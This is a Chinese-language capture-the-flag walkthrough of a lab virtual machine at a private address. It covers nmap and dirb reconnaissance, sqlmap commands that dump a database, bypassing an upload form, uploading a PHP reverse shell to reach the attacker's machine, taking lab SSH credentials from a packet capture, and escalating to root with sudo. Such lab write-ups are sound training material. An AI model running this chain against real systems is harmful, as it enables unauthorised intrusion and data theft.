一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.173 -p- -A

3、目录扫描

dirb http://192.168.236.173

二、漏洞探测

访问80端口

访问 /nt4stopc/

下面有一些问题，提示必须收集答案

都是一些判断题，对与错对应1与0，最后结果为

0110111001

拼接访问

点击图中位置，发现url中存在参数，可能存在注入

直接用sqlmap跑一下

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch

库名

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

tatil 库下的表名

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil --tables

gereksiz 表下得到一串值

python3 sqlmap.py -u "http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil -T gereksiz --dump

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf  folder upload.php

解码

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

可能是路径，拼接访问

再拼接 /upload.php

文件上传，以md5提交，但是没有提交按钮，自己在前端加一个

<input type="submit">

三、GetShell

kali 反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

nano php-reverse-shell.php

上传该文件后，返回了文件路径，文件名为md5加密后的

osas/2ad6bded962b884337eaeb921d7c2764.php

浏览器访问，kali 成功反弹到shell

http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

四、提权

使用python提高交互性

python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下发现 important.pcapng

查看文件内容，发现

email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work

url解码，得到以下数据

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

账号密码

mkelepce:mklpc-osas112.

ssh连接

ssh mkelepce@192.168.236.173

查看具有root权限的命令

sudo -l

显示为 all ，直接 sudo su 提权，提权成功

sudo su

查看flag